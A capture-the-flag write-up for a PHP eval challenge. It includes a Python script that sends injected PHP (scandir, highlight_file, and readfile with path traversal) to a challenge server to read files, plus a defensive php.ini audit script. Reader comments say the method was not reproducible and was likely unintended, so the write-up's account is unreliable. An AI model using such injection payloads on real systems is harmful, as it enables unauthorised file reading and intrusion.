Tags: web php 

Rating: 2.0

This was a PHP challenge where the website would simply `eval` the code you provided in the GET request.
At first I thought about using something like `system` or `exec`, but those functions and others like `shell_exec` were disabled.
We can verify that by executing `phpinfo();` and checking the functions listed under `disable_functions`.
So running any clever system code or something like a shell was out of the question.
Also look out for `open_basedir` in the PHP configuration you get from `phpinfo();`. Luckily for us, it was set to `/`, so we could explore the file system easily.

Using `__DIR__` and `scandir`, we can quickly check which directory the website is running from. There was only `index.php` in `/var/www/html`.
In the `/` directory, we find `flag.so` and `flag.h` (along with the `.dockerenv` folder and `start.sh`). Dumping `flag.so` (you can use `highlight_file`) gives the flag, as it was hardcoded in the binary.

`FLAG : flag{FFi_1s_qu1T3_DANg1ouS}`

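```python
import requests

url = "http://pwnable.org:19260"

# Payloads tried during the challenge; leave exactly one uncommented.
# payload = """echo $s = base64_encode(readfile("../../../flag.so"));"""
payload = """$f = scandir("/var/www/html");var_dump($f);"""
# payload = """$f = highlight_file('/start.sh');var_dump($f);"""

session = requests.Session()
# Pass the code via params so requests URL-encodes it correctly.
resp = session.get(url, params={"rh": payload})
final = resp.text
print(final)
```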
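
The two settings read from `phpinfo();` above can also be checked from the defender's side. The following is an added example, not code from the original writeup: it audits a php.ini fragment for command-execution functions left callable and for an `open_basedir` that reaches outside the document root. The sample fragments, the function list beyond `system`, `exec` and `shell_exec`, and the helper names are assumptions.

```python
import posixpath

# Assumed list: the functions the writeup names as disabled, plus common relatives.
EXEC_FUNCS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}

def parse_ini(text):
    """Collect key = value pairs from a php.ini fragment (full-line ';' comments skipped)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "[")) or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip().strip('"')
    return conf

def audit(conf, docroot):
    """Return findings for the two settings the writeup reads out of phpinfo()."""
    findings = []
    disabled = {f.strip().lower() for f in conf.get("disable_functions", "").split(",")}
    callable_exec = sorted(EXEC_FUNCS - disabled)
    if callable_exec:
        findings.append("exec functions not disabled: " + ", ".join(callable_exec))
    root = posixpath.normpath(docroot)
    entries = [posixpath.normpath(p) for p in conf.get("open_basedir", "").split(":") if p]
    if not entries:
        findings.append("open_basedir is unset")
    for entry in entries:
        if entry != root and not entry.startswith(root + "/"):
            findings.append("open_basedir allows " + entry + ", outside " + root)
    return findings

# Constructed samples: the first mirrors the values the writeup reports,
# the second confines file functions to the document root.
WEAK = """
disable_functions = system,exec,shell_exec,passthru,popen,proc_open
open_basedir = /
"""
HARDENED = """
disable_functions = system, exec, shell_exec, passthru, popen, proc_open
open_basedir = /var/www/html
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit(parse_ini(text), "/var/www/html"))
```

The first sample passes the `disable_functions` check yet still yields a finding, because file functions such as `scandir` and `highlight_file` are bounded only by `open_basedir`.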

Davicii, June 29, 2020, 1:45 p.m.

The open_basedir is showing /var/www/http and not /.
I also can't access the var or www dir through scandir.
How did you get it? Can you give some more details please?

iqno, June 29, 2020, 3:49 p.m.

Could you elaborate a bit more on how you were able to read outside of the /var/www/http directory?
`$t = scandir("/"); var_dump($t);` evaluates to `bool(false)` as the www-data user presumably doesn't have the permissions to read anywhere except /var/www/http.
And as the previous comment mentions, the open_basedir is set to /var/www/html?

Scalpel, June 29, 2020, 5:28 p.m.

I think this might have been the unintended solution. I got the same solution, but only once. It was not reproducible, because all the other times I tried, the / directory was empty. Only one time was I able to list contents of the files in /.

There was a new challenge, noeasyphp, that was put up during the competition because of instability of easyphp.

Isopach, June 30, 2020, 8:42 a.m.

Your solution probably depended on someone else with a bypass trying to solve the challenge, which is why it doesn't work anymore.